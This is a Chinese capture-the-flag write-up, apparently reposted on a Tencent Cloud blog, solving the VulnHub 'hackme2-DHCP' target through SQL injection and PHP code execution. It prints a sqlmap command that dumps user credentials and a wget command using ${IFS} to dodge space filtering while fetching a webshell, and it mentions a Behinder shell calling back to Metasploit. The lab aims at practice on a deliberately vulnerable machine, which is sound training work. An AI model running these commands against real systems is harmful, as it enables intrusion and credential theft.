首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >hackDHCP靶场教程

hackDHCP靶场教程

作者头像
天钧
发布2021-08-13 11:36:07
发布2021-08-13 11:36:07
8270
举报
文章被收录于专栏:渗透云笔记渗透云笔记

靶场地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova

第一眼就看见了注册,那么这个靶场的思路可能就是注册后的操作,毕竟如果不是,开了这个也没什么用

注册一个用户,然后登陆,登陆成功,翻译了一下是个图书查询的系统

通过页面对比,猜测是个注入

跑了一下

sqlmap -r a.txt -vv --tamper=space2comment --dbms "MySQL" --level 5 -D webapphacking -C "user,pasword" –dump

结果

特殊的用户

Superadmin

解密后

进来了

超级管理员权限

进来的页面有两个点,一个是文件上传,一个是不知道干什么的表单提交,思考如下

制作者考的肯定不是上传点,很明显上传点会难一些,地下更不会放一个无用的表单,挂上XRAY,对功能进行打点,找出容易攻击到的点

Xray扫描入下

可以执行PHP代码

尝试复现

命令执行成功

Wge 下载webshell wget${IFS}http://0.0.0.0//a.php

${IFS}是代替空格的占位符,上线

上传脚本到

发现了一个特殊文件

切换到交互式,还需要往外弹一下

卡壳

最终解决,上传冰蝎马反弹msf 唉,不知道这个靶子为什么nc 用不了

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档